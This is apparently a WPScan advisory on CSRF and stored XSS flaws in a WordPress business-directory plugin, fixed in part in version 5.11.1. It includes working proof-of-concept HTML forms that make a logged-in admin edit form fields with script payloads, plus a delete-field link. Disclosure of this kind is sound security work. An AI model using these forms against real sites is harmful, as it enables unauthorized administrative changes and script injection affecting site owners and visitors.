The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues. Note (WPScanTeam): The CSRF has ben fixed and proper capability checks have also been added in 5.11.1, however some sanitisation was still missing, still allowing XSS via a high privilege account in other pages and a different issue has been created for it
<!-- Change Form Field XSS --> <form action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1" method="post"> <input type="hidden" name="field[id]" value="1"> <input type="hidden" name="field[tag]" value="title"> <input type="hidden" name="field[weight]" value="9"> <label> Field Label </label> <input name="field[label]" type="text" aria-required="true" value="<script>alert(1)</script>"> <label> Field description <span class="description">(optional)</span></label> <input name="field[description]" type="text" value="<script>alert(1)</script>"> <input type="submit" name="submit" id="submit" class="button button-primary" value="Update Field"> </form> <!-- Add Form Field XSS --> <form action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1" method="post"> <label> Field Label </label> <input name="field[label]" type="text" aria-required="true" value="<script>alert(1)</script>"> <label> Field description <span class="description">(optional)</span></label> <input name="field[description]" type="text" value="<script>alert(1)</script>"> <input type="submit" name="submit" id="submit" class="button button-primary" value="Update Field"> </form> XSS payloads execute: - On the business directory page when adding a listing: /business-directory/?wpbdp_view=submit_listing - On the Import/Export page: /wp-admin/admin.php?page=wpbdp_admin_csv - When adding/editing a listing /wp-admin/post-new.php?post_type=wpbdp_listing - On various Settings page, such as /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=listings%2Fsorting, /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=search_settings <!-- Delete Form Field--> <a href="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=deletefield&id=1">Delete</a>
0xB9
0xB9
Yes
2021-04-11 (about 1 years ago)
2021-04-12 (about 1 years ago)
2021-04-15 (about 1 years ago)